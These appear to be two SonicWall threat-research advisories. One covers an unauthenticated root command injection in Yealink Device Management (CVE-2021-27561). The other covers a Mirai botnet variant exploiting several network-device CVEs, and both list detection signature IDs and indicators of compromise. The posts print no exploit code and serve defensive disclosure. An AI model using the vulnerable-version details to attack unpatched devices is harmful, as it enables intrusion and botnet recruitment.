Posts

Yealink Device Management Command Injection Vulnerability

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in Yealink devices.

Yealink’s powerful GUI-driven Yealink Device Management Platform delivers a comprehensive set of tools for implementing up to 5,000 Microsoft-certified Yealink Skype for Business IP phones. The platform solves the complexities of provisioning, management, call quality control and troubleshooting. The solution allows system-wide oversight and the ability to drill down into specific needs for various regions, user groups or even a particular device model.

Yealink Device Management Command Injection Vulnerability | CVE-2021-27561
A command injection vulnerability exists in Yealink Device Management. It  allows command injection as root via the  URI, without authentication.

Yealink DM server does not filter the user provided data which allows remote unauthenticated attackers to execute arbitrary commands.

In the above exploit, the attacker is able to bypass authentication and download and execute malicious script from the attacker controlled server .

Following versions are vulnerable:

  • Yealink Device Management (DM) 3.6.0.20

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 15456:Yealink DM Remote Code Execution

IoCs

  • 03f37a12673fd7ad01b744f84b61aad062a5b6eafbeb7aeac4a00ef28159ad80
  • 203.159.80.241

Threat Graph

Critical Vulnerabilities Of Network Security Devices Being Utilized By Mirai Botnet Malware

/in /by

The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are affected by critical vulnerabilities. The following vulnerabilities are involved:

  • CVE-2020-25506: D-Link DNS-320 firewall exploit
  • CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
  • CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
  • CVE-2020-26919: Netgear ProSAFE Plus exploit
  • CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
  • CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

  • CVE-2020-25506
    IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
  • CVE-2021-27561/CVE-2021-27562
    IPS:15456 Yealink DM Remote Code Execution
  • CVE-2021-22502
    IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
  • CVE-2019-19356
    IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
    This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
    IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
    IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
  • GAV signatures to cover malware samples:
    GAV: Mirai.LL
    GAV: Mirai.LL_1